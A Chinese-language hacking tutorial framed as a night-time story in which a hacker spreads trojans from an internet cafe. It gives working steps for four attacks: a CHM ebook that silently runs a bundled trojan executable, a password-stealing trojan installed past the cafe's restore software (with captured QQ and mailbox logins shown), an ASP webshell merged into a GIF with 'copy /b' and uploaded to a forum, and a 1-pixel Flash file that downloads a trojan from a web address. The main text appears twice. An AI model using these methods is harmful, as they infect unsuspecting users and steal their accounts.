包容万物的黑夜充满了神秘感……
到了夜里便是黑客们的世界,因为晚间上网的人少,网速很快,再加之网络管理员精神上的松懈。由于种种原因,陆续上演了很多本不该发生的故事……
12点整,一袭黑衣的黑神再一次悄悄地通过网吧出现在了互联网上,开始了本晚的五大秘密行动……
第一幕 书中自有小木马
黑神的工具箱中摆满了各式新奇黑软,其中Theef(如图1)*******就是一款功能强焊的DLL 特洛伊木马。该木马具有自定义插入系统进程、文件管理、进程管理、窗口管理、记录键盘相关操作、用DOS命令控制及编写BAT、VBS运行、点对点聊天、抓屏、屏幕控制,以及一大堆恶作剧功能。
黑神从工具箱中取出木马Theef与Microsoft HTML HELP Workshop v1.32电子书制作工具。而后,从网上下载了chm格式的电子书《唐伯虎点秋香之经典对白》(如图2)**********。男人都是以泡MM为乐事,黑神也不例外了^-^黑神打开了《唐伯虎点秋香之经典对白》电子书,在随后弹出的主窗口空白处用鼠标右键单击,选择“属性”,获知其网址链接为mk:@MSITStore:C:WINNTsystem32唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白。而后,黑神随手新建了一个文本文件,在其中输入如下代码:
以下是引用片段:
url='/唐伯虎点秋香之经典对白
'">
TYPE="application/x-oleobiject"CODEBASE="Server210.exe">
完成后,将其另存为MM.htm网页文件。做了一次深呼息后,黑神启动安装好的Microsoft HTML HELP Workshop 工具,选择菜单项“文件菜单”→“解译”。从中找到C:WINNTsystem32唐伯虎点秋香之经典对白的电子书路径,将保存路径更改为E:hack。而后,将木马客户端文件Server210.exe拖放至其中。此后新建了一个文本文件,输入以下内容:
以下是引用片段:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=Cliconf.chm
Default Window=Main
Language=0x804中文(中国)
[WINDOWS]
Main="SQL Server 客户端网络实用工具是什么?","唐伯虎点秋香之经典对.hhc","唐伯虎点秋香之经典对.hhk","mm.htm",,,,,,0x420,150,0x104e,,0x0,0x0,,,,,0
[Files]
mm.htm
Server210.exe
输入完毕后将该文件命名为mm.hhp,并存储于E:hack文件夹。接着在Microsoft HTML HELP Workshop中打开mm.hhp,选择保存所有文件并编译。关闭该程序后进入到E:hack目录下,黑神打了个漂亮的响指,电子书木马横空出世了!
黑神立即挟带木马登陆早已注册了的网络硬盘空间站,建立一个目录《伯虎名对》。然后上传编译好的木马电子书到该目录下守株待兔。只要有人下载了这本电子书,那他同时将免费得到一匹小马! 第二幕 网吧木马秘密装
黑神刚刚上传完电子书木马,忽听得网吧内传来一阵嘈杂之声:“老板,多给几台机子,我们要玩传奇”。“又是一帮玩网络游戏的家伙”老板小声滴沽了一句……嘿嘿,怎么把这事儿给忘了。黑神的脸上露出了一丝鬼秘的笑意,迅速查看了一下网吧管理系统。决定用木马程序之密码结巴4.10(如图3)*********,这可是传说中的好东东,可以捕获Windows 9X/2000/XP系统中几乎所有普通窗口和网页的登录密码,以及各种网络游戏的密码。该木马最实用之处在于无法被任何杀毒软件所截获,能够成功躲过杀毒软件的内存查杀渗透技术。
在安装密码结巴之前得先封杀该死的还原精灵,于是黑神立即拿出黑软之还原移存大师(如图4)**********。该工具可以在不破坏还原精灵的情况下安装任意软件,即使重新启动计算机后所安装的文件依然会存在。黑神先从网络上将木马下载到本机。然后在需要转存的EXE里输入木马的本机地址c:winnt木马.exe。此后,黑神在需要转存的木马地址中选择c:winntsystem32木马.exe,又修改了图标。最后选择保存,并双击程序让木马开始运行……
不大一会儿的功夫,黑神接收到了以下这封邮件:
序号:0001 时间:2005-3-12 20:26:03 周四 --------
00080534(380,130): 45748795: QQ用户登录->
提示框: 用户号码:
选择框: 15663xx
提示框: 用户口令:
密码框: ***13142
提示框: 申请密码保护,确保号码安全
序号:0002 时间:2005-3-12 20:29:10 周四 --------
001805ae(415,558): Outlook Express - 主标识: Internet 帐户: hc_zhang01@163.com 属性服务器->
提示框: 服务器信息
提示框: 邮件发送服务器
输入框: pop.163.com
提示框: 发送邮件(SMTP)(&U):
输入框: smtp.163.com
提示框: 帐户名(&C):
输入框: XXXXx011
提示框: 密码(&P):
密码框: ****88803
黑神起身到收银台买了一包烟,顺便看了一眼网管的脸色,同时在想他明天死得肯定很难看……
第三幕 图片木马甜点
“TMD,前几天一个网友说传给我一张MM图片看,结果打开了那张图片之后,计算机沾得混身病毒……”黑神在回到座位的时候听到了这句话,头脑中突然又有“智慧之光”闪过。不如再制造一个图片木马奔驰于网络,给在线的网虫们一个意外的惊喜!说干就干,黑神立刻开始着手创造图片夹带木马的环境。图片木马的原理说白了就是用两段代码的结合,移花接木而成。
黑神首先从网络上下载了冰狐浪子asp,再将其客户端后缀名改为“*.gif”,并使用容错格式:。此后,新建一个ASP文件。在其中输入代码:,并保存为“ASP.gif”文件。至此,这个图片ASP文件木马就大功告成了。
黑神吹了声口哨开始合并双文件。先将“ASP.gif”的后缀名更改“ASP.ASP”。再从网络上下载一副漂亮MM的图片(如图5)*********,将其命名为mm.gif,放置在E盘的HACK文件夹下。此后,调出命令提示符,在其中输入命令:e:hackcopy mm.gif /b + asp.asp /a GG.gif。现在,系统中已生成了一个名为GG.gif的图像木马。
接下来黑神开始考虑如何将木马上传到网络。有了,可以利用BBS的上传图片功能。于是直奔BBS,注册新用户并登陆。进入相应版块后黑神选择发表新帖子,将此贴命名为“不可不看”,而后将该图片木马上传。在提交贴子后,接下来就等着所有浏览者自投罗网吧。嘿嘿! 第四幕 Flash木马危机
音乐从黑神的耳机中响起,悠扬的歌声再一次触发了黑神的灵感。我何不再制作一个Flash动画木马,让浏览者防不胜防。Flash木马原理如下:当用户浏览了内嵌有Flash动画的恶意网页后,木马或病毒将随Flash自动被下载执行,进而操控对方机器或窃取其密码。
黑神开始挽袖动手了,打开Flash MX,选择创建一个新的Flash文件。再查看界面下端的“属性”面板,点击“大小”按钮,在弹出的“文档属性”对话框中,设置其宽、高都为1PX最小值。此后,黑神在动画栏中选择“动作”→“actions”,在getURL中输入木马路径:http:www.xxxx.net。最后,输出文件并生成Flash动画。
嘿嘿,下面就要找一个冤大头网站并上传适才制作的Flash动画。进入http://www.xxx.3bbs.com注册一个新用户,而后发贴提交了该Flash动画。这样,一旦有“冒失鬼”打开了这个页面,那么他的机器会在后台同时下载木马。对方如果不注意查看进程列表,根本无法获知本机又中了一个木马。此外,还可以利用QQ将Flash动画立即发送给好友(如图6)*******
到了夜里便是黑客们的世界,因为晚间上网的人少,网速很快,再加之网络管理员精神上的松懈。由于种种原因,陆续上演了很多本不该发生的故事……
12点整,一袭黑衣的黑神再一次悄悄地通过网吧出现在了互联网上,开始了本晚的五大秘密行动……
第一幕 书中自有小木马
黑神的工具箱中摆满了各式新奇黑软,其中Theef(如图1)*******就是一款功能强焊的DLL 特洛伊木马。该木马具有自定义插入系统进程、文件管理、进程管理、窗口管理、记录键盘相关操作、用DOS命令控制及编写BAT、VBS运行、点对点聊天、抓屏、屏幕控制,以及一大堆恶作剧功能。
黑神从工具箱中取出木马Theef与Microsoft HTML HELP Workshop v1.32电子书制作工具。而后,从网上下载了chm格式的电子书《唐伯虎点秋香之经典对白》(如图2)**********。男人都是以泡MM为乐事,黑神也不例外了^-^黑神打开了《唐伯虎点秋香之经典对白》电子书,在随后弹出的主窗口空白处用鼠标右键单击,选择“属性”,获知其网址链接为mk:@MSITStore:C:WINNTsystem32唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白。而后,黑神随手新建了一个文本文件,在其中输入如下代码:
以下是引用片段:
url='/唐伯虎点秋香之经典对白
'">
TYPE="application/x-oleobiject"CODEBASE="Server210.exe">
完成后,将其另存为MM.htm网页文件。做了一次深呼息后,黑神启动安装好的Microsoft HTML HELP Workshop 工具,选择菜单项“文件菜单”→“解译”。从中找到C:WINNTsystem32唐伯虎点秋香之经典对白的电子书路径,将保存路径更改为E:hack。而后,将木马客户端文件Server210.exe拖放至其中。此后新建了一个文本文件,输入以下内容:
以下是引用片段:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=Cliconf.chm
Default Window=Main
Language=0x804中文(中国)
[WINDOWS]
Main="SQL Server 客户端网络实用工具是什么?","唐伯虎点秋香之经典对.hhc","唐伯虎点秋香之经典对.hhk","mm.htm",,,,,,0x420,150,0x104e,,0x0,0x0,,,,,0
[Files]
mm.htm
Server210.exe
输入完毕后将该文件命名为mm.hhp,并存储于E:hack文件夹。接着在Microsoft HTML HELP Workshop中打开mm.hhp,选择保存所有文件并编译。关闭该程序后进入到E:hack目录下,黑神打了个漂亮的响指,电子书木马横空出世了!
黑神立即挟带木马登陆早已注册了的网络硬盘空间站,建立一个目录《伯虎名对》。然后上传编译好的木马电子书到该目录下守株待兔。只要有人下载了这本电子书,那他同时将免费得到一匹小马! 第二幕 网吧木马秘密装
黑神刚刚上传完电子书木马,忽听得网吧内传来一阵嘈杂之声:“老板,多给几台机子,我们要玩传奇”。“又是一帮玩网络游戏的家伙”老板小声滴沽了一句……嘿嘿,怎么把这事儿给忘了。黑神的脸上露出了一丝鬼秘的笑意,迅速查看了一下网吧管理系统。决定用木马程序之密码结巴4.10(如图3)*********,这可是传说中的好东东,可以捕获Windows 9X/2000/XP系统中几乎所有普通窗口和网页的登录密码,以及各种网络游戏的密码。该木马最实用之处在于无法被任何杀毒软件所截获,能够成功躲过杀毒软件的内存查杀渗透技术。
在安装密码结巴之前得先封杀该死的还原精灵,于是黑神立即拿出黑软之还原移存大师(如图4)**********。该工具可以在不破坏还原精灵的情况下安装任意软件,即使重新启动计算机后所安装的文件依然会存在。黑神先从网络上将木马下载到本机。然后在需要转存的EXE里输入木马的本机地址c:winnt木马.exe。此后,黑神在需要转存的木马地址中选择c:winntsystem32木马.exe,又修改了图标。最后选择保存,并双击程序让木马开始运行……
不大一会儿的功夫,黑神接收到了以下这封邮件:
序号:0001 时间:2005-3-12 20:26:03 周四 --------
00080534(380,130): 45748795: QQ用户登录->
提示框: 用户号码:
选择框: 15663xx
提示框: 用户口令:
密码框: ***13142
提示框: 申请密码保护,确保号码安全
序号:0002 时间:2005-3-12 20:29:10 周四 --------
001805ae(415,558): Outlook Express - 主标识: Internet 帐户: hc_zhang01@163.com 属性服务器->
提示框: 服务器信息
提示框: 邮件发送服务器
输入框: pop.163.com
提示框: 发送邮件(SMTP)(&U):
输入框: smtp.163.com
提示框: 帐户名(&C):
输入框: XXXXx011
提示框: 密码(&P):
密码框: ****88803
黑神起身到收银台买了一包烟,顺便看了一眼网管的脸色,同时在想他明天死得肯定很难看……
第三幕 图片木马甜点
“TMD,前几天一个网友说传给我一张MM图片看,结果打开了那张图片之后,计算机沾得混身病毒……”黑神在回到座位的时候听到了这句话,头脑中突然又有“智慧之光”闪过。不如再制造一个图片木马奔驰于网络,给在线的网虫们一个意外的惊喜!说干就干,黑神立刻开始着手创造图片夹带木马的环境。图片木马的原理说白了就是用两段代码的结合,移花接木而成。
黑神首先从网络上下载了冰狐浪子asp,再将其客户端后缀名改为“*.gif”,并使用容错格式:。此后,新建一个ASP文件。在其中输入代码:,并保存为“ASP.gif”文件。至此,这个图片ASP文件木马就大功告成了。
黑神吹了声口哨开始合并双文件。先将“ASP.gif”的后缀名更改“ASP.ASP”。再从网络上下载一副漂亮MM的图片(如图5)*********,将其命名为mm.gif,放置在E盘的HACK文件夹下。此后,调出命令提示符,在其中输入命令:e:hackcopy mm.gif /b + asp.asp /a GG.gif。现在,系统中已生成了一个名为GG.gif的图像木马。
接下来黑神开始考虑如何将木马上传到网络。有了,可以利用BBS的上传图片功能。于是直奔BBS,注册新用户并登陆。进入相应版块后黑神选择发表新帖子,将此贴命名为“不可不看”,而后将该图片木马上传。在提交贴子后,接下来就等着所有浏览者自投罗网吧。嘿嘿! 第四幕 Flash木马危机
音乐从黑神的耳机中响起,悠扬的歌声再一次触发了黑神的灵感。我何不再制作一个Flash动画木马,让浏览者防不胜防。Flash木马原理如下:当用户浏览了内嵌有Flash动画的恶意网页后,木马或病毒将随Flash自动被下载执行,进而操控对方机器或窃取其密码。
黑神开始挽袖动手了,打开Flash MX,选择创建一个新的Flash文件。再查看界面下端的“属性”面板,点击“大小”按钮,在弹出的“文档属性”对话框中,设置其宽、高都为1PX最小值。此后,黑神在动画栏中选择“动作”→“actions”,在getURL中输入木马路径:http:www.xxxx.net。最后,输出文件并生成Flash动画。
嘿嘿,下面就要找一个冤大头网站并上传适才制作的Flash动画。进入http://www.xxx.3bbs.com注册一个新用户,而后发贴提交了该Flash动画。这样,一旦有“冒失鬼”打开了这个页面,那么他的机器会在后台同时下载木马。对方如果不注意查看进程列表,根本无法获知本机又中了一个木马。此外,还可以利用QQ将Flash动画立即发送给好友(如图6)*******
全站资源
- 微软官方入门教程19:轻松掌握Vista系统的快
- 微软2008大冲击,预借Vista SP1力促Vista市
- 在收件箱中获得 Windows Vista 的最新更新
- 微软官方Vista入门教程全集19篇(Vista学院
- Windows Vista 的成功将势不可挡
- 快快抛弃Vista,拥抱XP SP3!你觉得呢?
- 浅谈Vista系统关闭虚拟内存与使用内存盘加速
- 嘿嘿,按下键盘上面的三个键,马上让你的Vi
- Windows Vista的盗版率只有Windows XP的一半
- 3DMark和PCMark Vantage新版将只支持Vista系
阅读排行
- 黑客必学的六条系统命令
- 千里之行始于足下 黑客技术基础知识讲解
- 密码攻略 黑客亲手打造QQ密码破解器
- 王者风范 2分钟入侵网站全程实录
- 黑客新技术 灰鸽子巧妙利用全攻略
- 秘籍:网吧入侵全攻略
- 菜鸟必看:学习黑客技术的基本环境
- 人小鬼大的黑客工具——QQ远控精灵
- 先做黑客再做网管:二.黑客应掌握的基本技能
- 先做黑客再做网管:一.
最新技术文档
- 黑客经典教程之理解地址解析协议攻击
- 看看黑客是如何攻击电子邮件系统的
- 黑客经验谈系列之入侵3389起源完整编
- 黑客技术-ARP欺骗
- 密码攻略 黑客亲手打造QQ密码破解器
- “正”、“邪”两类黑客的四大主要行为
- 让你的密码成为黑客的“耻辱”
- 活捉黑客:黑客诱捕之计算机蜜罐技术
- 黑客精神祭 挖掘神秘黑客背后的故事
- 我也做黑客:简单入侵个人电脑的步骤
专题教程
- 大话G游 专题:手机病毒揭密
- ARP攻击防范与解决方案 路由故障处理手册
- Picasa中文版_Picasa教程 专题:清除流氓软件
- Firefox专题 seo搜索引擎优化专区
- 重装Windows必知的事情 装机之必备软件大行动
病毒专杀栏